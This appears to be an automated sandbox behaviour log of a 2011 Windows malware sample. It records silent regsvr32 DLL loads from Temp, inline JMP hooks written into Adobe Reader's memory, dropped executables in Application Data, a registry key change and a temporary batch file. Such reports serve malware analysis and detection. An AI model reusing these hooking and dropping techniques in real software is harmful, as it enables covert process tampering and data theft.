Process created PID: 1008 Path: C:\WINDOWS\system32\regsvr32.exe Cmdline: regsvr32 -s C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wpbt0.dll Createflags: 0 success or wait 2639120696
File opened Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\ZLL6TAVD\w[1].htm Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2659158011
File opened Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\ZLL6TAVD\w[1].htm Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2659159364
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 5FB0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2659163437
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 115B0000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2659165437
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: write and read and execute Type: commit Baseaddress: 5FC0000 Size: 12288 Protection: execute Mapped to pid: own pid success or wait 2659236056
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and read Type: commit Baseaddress: 5FC0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2659246164
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: write and read and execute Type: commit Baseaddress: 5FC0000 Size: 12288 Protection: execute Mapped to pid: own pid success or wait 2659248762
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and read Type: commit Baseaddress: 5FC0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2659254199
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and read Type: commit Baseaddress: 5FC0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2659261377
Process created PID: 1852 Path: C:\WINDOWS\system32\regsvr32.exe Cmdline: regsvr32 -s C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wpbt1.dll Createflags: 0 success or wait 2659263840
Memory allocated PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 116B0000 Length: 116AF8C8 Allocation Type: null Protection: page read and write success or wait 2664850798
Memory allocated PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 116B0000 Length: 116AF8CC Allocation Type: null Protection: page read and write success or wait 2664851092
File opened Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi.dat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2664861990
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: Enabled object name not found 2664887634
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: EnabledV8 success or wait 2664890438
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: CleanCookies success or wait 2664907158
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: CleanCookies success or wait 2664908163
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1406 success or wait 2664908766
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1609 success or wait 2665006427
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1406 success or wait 2665154541
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1609 success or wait 2665156473
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1406 success or wait 2665158536
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1609 success or wait 2665159176
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1406 success or wait 2665159910
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1609 success or wait 2665160620
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1406 success or wait 2665161333
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 1609 success or wait 2665161967
Memory allocated PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC0000 Length: 116AF4C0 Allocation Type: null Protection: page execute and read and write success or wait 2665163090
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665164212
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7C90D1AE Length: 30 Value: B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 2665164669
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC0000 Length: 10 Value: B8 35 00 00 00 E9 A9 D1 94 75 success or wait 2665199808
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7C90D1AE Length: 5 Value: E9 A4 AE 6C 89 success or wait 2665254914
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7C90D1AE Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665255825
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665256940
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7C91632D Length: 30 Value: 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 2665279259
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC000A Length: 10 Value: 68 6C 02 00 00 E9 1E 63 95 75 success or wait 2665281828
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7C91632D Length: 5 Value: E9 09 1F 6C 89 success or wait 2665290587
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7C91632D Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665290910
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 77212EBC Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665291545
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 77212EBC Length: 30 Value: 8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75 success or wait 2665291902
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC0014 Length: 10 Value: 8B FF 55 8B EC E9 A3 2E 25 70 success or wait 2665300367
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 77212EBC Length: 5 Value: E9 FD 4B DB 8E success or wait 2665301330
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 77212EBC Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665301654
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C60A1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665302759
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C60A1 Length: 30 Value: 8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D success or wait 2665310469
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC001E Length: 10 Value: 8B FF 55 8B EC E9 7E 60 20 70 success or wait 2665311471
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C60A1 Length: 5 Value: E9 6F 1A E0 8E success or wait 2665320208
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C60A1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665320605
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771CE9C1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665321691
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771CE9C1 Length: 30 Value: 8B FF 55 8B EC 83 EC 14 53 56 33 C0 57 33 D2 33 DB 33 FF 33 C9 39 55 08 89 45 F8 89 45 EC success or wait 2665322050
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC0028 Length: 10 Value: 8B FF 55 8B EC E9 94 E9 20 70 success or wait 2665330462
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771CE9C1 Length: 5 Value: E9 A6 91 DF 8E success or wait 2665331420
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771CE9C1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665331745
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 77212FC1 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665332361
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 77212FC1 Length: 30 Value: 8B FF 55 8B EC 53 56 57 33 DB 33 C0 33 C9 33 D2 33 FF 39 5D 10 75 39 8B 75 0C 85 F6 74 21 success or wait 2665340076
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC0032 Length: 10 Value: 8B FF 55 8B EC E9 8A 2F 25 70 success or wait 2665341065
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 77212FC1 Length: 5 Value: E9 4B 4C DB 8E success or wait 2665349394
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 77212FC1 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665349663
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C4D8C Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665350749
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C4D8C Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 33 DB 33 F6 F6 05 94 BD 23 77 01 89 5D FC 0F 84 BA 7E 00 00 39 success or wait 2665351106
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC003C Length: 10 Value: 8B FF 55 8B EC E9 4B 4D 20 70 success or wait 2665360881
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C4D8C Length: 5 Value: E9 25 2F E0 8E success or wait 2665361839
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C4D8C Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665362161
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C82EA Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665362765
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C82EA Length: 30 Value: 8B FF 55 8B EC 83 EC 24 53 33 DB 39 1D 8C B8 23 77 57 89 5D F4 89 5D F8 89 5D F0 C7 45 E8 success or wait 2665372840
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC0046 Length: 10 Value: 8B FF 55 8B EC E9 9F 82 20 70 success or wait 2665373836
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C82EA Length: 5 Value: E9 0A FA DF 8E success or wait 2665383192
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C82EA Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665383523
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771F9100 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665384361
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771F9100 Length: 30 Value: 8B FF 55 8B EC 83 EC 20 53 56 33 C0 57 33 FF 40 39 3D 8C B8 23 77 89 7D FC 89 7D F8 89 45 success or wait 2665384729
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC0050 Length: 10 Value: 8B FF 55 8B EC E9 AB 90 23 70 success or wait 2665394485
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771F9100 Length: 5 Value: E9 34 EC DC 8E success or wait 2665395440
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771F9100 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665395760
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771D89F7 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665396800
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771D89F7 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D 8C B8 23 77 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 2665405298
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC005A Length: 10 Value: 8B FF 55 8B EC E9 98 89 21 70 success or wait 2665406282
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771D89F7 Length: 5 Value: E9 8B F3 DE 8E success or wait 2665415666
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771D89F7 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665415991
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C79C2 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665417074
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C79C2 Length: 30 Value: 6A 2C 68 10 7B 1C 77 E8 A7 9C FE FF 33 DB 89 5D DC 89 5D E4 39 1D 8C B8 23 77 0F 84 E8 95 success or wait 2665417436
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC0064 Length: 12 Value: 6A 2C 68 10 7B 1C 77 E9 59 79 20 70 success or wait 2665423103
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C79C2 Length: 5 Value: E9 F0 03 E0 8E success or wait 2665424077
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771C79C2 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665424400
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771F9C53 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665425392
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771F9C53 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 0C FF 75 08 E8 1A F4 FD FF 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 2665434194
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC0070 Length: 10 Value: 8B FF 55 8B EC E9 DE 9B 23 70 success or wait 2665435187
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771F9C53 Length: 5 Value: E9 B4 E1 DC 8E success or wait 2665444568
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771F9C53 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665444841
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771D9064 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665445828
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771D9064 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 2665446185
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC007A Length: 10 Value: 8B FF 55 8B EC E9 E5 8F 21 70 success or wait 2665455443
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771D9064 Length: 5 Value: E9 BB ED DE 8E success or wait 2665456395
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771D9064 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665456716
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771BB1D8 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665457945
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771BB1D8 Length: 30 Value: 8B FF 55 8B EC 83 EC 48 53 8B 5D 10 56 33 F6 39 75 14 57 8B 7D 0C C7 45 F4 01 00 00 00 89 success or wait 2665469723
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC0084 Length: 10 Value: 8B FF 55 8B EC E9 4F B1 1F 70 success or wait 2665470779
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771BB1D8 Length: 5 Value: E9 5F CC E0 8E success or wait 2665479405
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 771BB1D8 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2665480235
Memory attributes changed PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 71AB3E2B Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2665480804
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 71AB3E2B Length: 30 Value: 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 2665481203
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 6FC008E Length: 10 Value: 8B FF 55 8B EC E9 98 3D AF 6A success or wait 2665503714
Memory written PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 71AB3E2B Length: 5 Value: E9 3E E9 51 94 success or wait 2665504702
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 71AB4C27 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 2665521238
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 71AB68FA Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 2665589589
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 71AB676F Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 5E 4A 00 00 8D 45 success or wait 2665859541
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 71AB4CB5 Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 80 65 00 00 8D 45 F8 50 E8 DD success or wait 2665862544
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7E41ECA3 Length: 30 Value: B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 2665868288
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7E41FE6E Length: 30 Value: B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 2665875929
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7E428D20 Length: 30 Value: 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2665947979
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7E42C17E Length: 30 Value: 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2665952058
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7E423D3A Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2665955969
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7E43E577 Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2666082257
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7E430833 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 2666182214
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7E44F965 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 2666248169
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7E430A47 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 2666252391
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7E44F9B4 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 2666255655
Memory read PID: 1732 Path: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Base: 7E42A01E Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 2666260847
System info queried Type: ProcessInformation success or wait 2666544892
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 6FD0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2666552409
Thread created PID: 1732 TID: 2140 EIP: 7C8106F9 Imagepath: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Injected: false success or wait 2666892358
Mutant created Name: \BaseNamedObjects\Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44} object name exists 2666935438
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 15807505 success or wait 2666935999
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Explorer\PhishingFilter Name: 15807505 success or wait 2666936517
Key value replaced with new Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Noycir Name: 15807505 Type: Dword Data: -1521036916 Old data: -1521036924 success or wait 2667051482
System info queried Type: ProcessInformation success or wait 2786832483
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 6FD0000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2786839294
Thread created PID: 1732 TID: 2556 EIP: 7C8106F9 Imagepath: C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe Injected: false success or wait 2787136056
+ Sections
+ General
Start time: 05:44:25
Start date: 08/12/2011
Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe
Commandline: .7663042396006076.exe
Imagebase: 0x400000
File size: 257536 bytes
MD5 hash: 74185020DEA5693BC25348C6AF34CF87
File Activities:
+ File opened
| File Path | Access | Options | Content overwritten | Completion | Count | Source Address |
|---|---|---|---|---|---|---|
| C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe | read attributes and synchronize and generic read | synchronous io non alert and non directory file | false | success or wait | 2 | 411C01 |
| C:\Documents and Settings\Administrator\Application Data | read attributes and synchronize and generic read | synchronous io non alert and open for backup ident | false | success or wait | 1 | 411FD5 |
| C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe | read attributes and write attributes and synchronize | synchronous io non alert and non directory file | false | success or wait | 1 | 411ECA |
| C:\Documents and Settings\Administrator\Application Data\Avliy | read attributes and write attributes and synchronize | synchronous io non alert and non directory file | false | file is a directory | 1 | 411ECA |
| C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi | read attributes and write attributes and synchronize | synchronous io non alert and non directory file | false | success or wait | 1 | 411ECA |
| C:\Documents and Settings\Administrator\Application Data\Ehotpo | read attributes and write attributes and synchronize | synchronous io non alert and non directory file | false | file is a directory | 1 | 411ECA |
| C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat | read attributes and synchronize and generic write | synchronous io non alert and non directory file | true | success or wait | 1 | 411B8E |
+ File created
| File Path | Access | Attributes | Options | Completion | Count | Source Address |
|---|---|---|---|---|---|---|
| C:\Documents and Settings\Administrator\Application Data\Avliy | read data or list directory and synchronize | normal | directory file and synchronous io non alert and open for backup ident | success or wait | 1 | 412AE5 |
| C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 2 | 412B36 |
| C:\Documents and Settings\Administrator\Application Data\Ehotpo | read data or list directory and synchronize | normal | directory file and synchronous io non alert and open for backup ident | success or wait | 1 | 412AE5 |
| C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 412B36 |
| C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 411DD7 |
+ File deleted
| File Path | Completion | Count | Source Address |
|---|---|---|---|
| C:\Documents and Settings\Administrator\Application Data\Avliy\rook.exe | success or wait | 1 | 411D4D |
+ File written
| File Path | Offset | Length | Value | Completion | Count | Source Address |
|---|---|---|---|---|---|---|
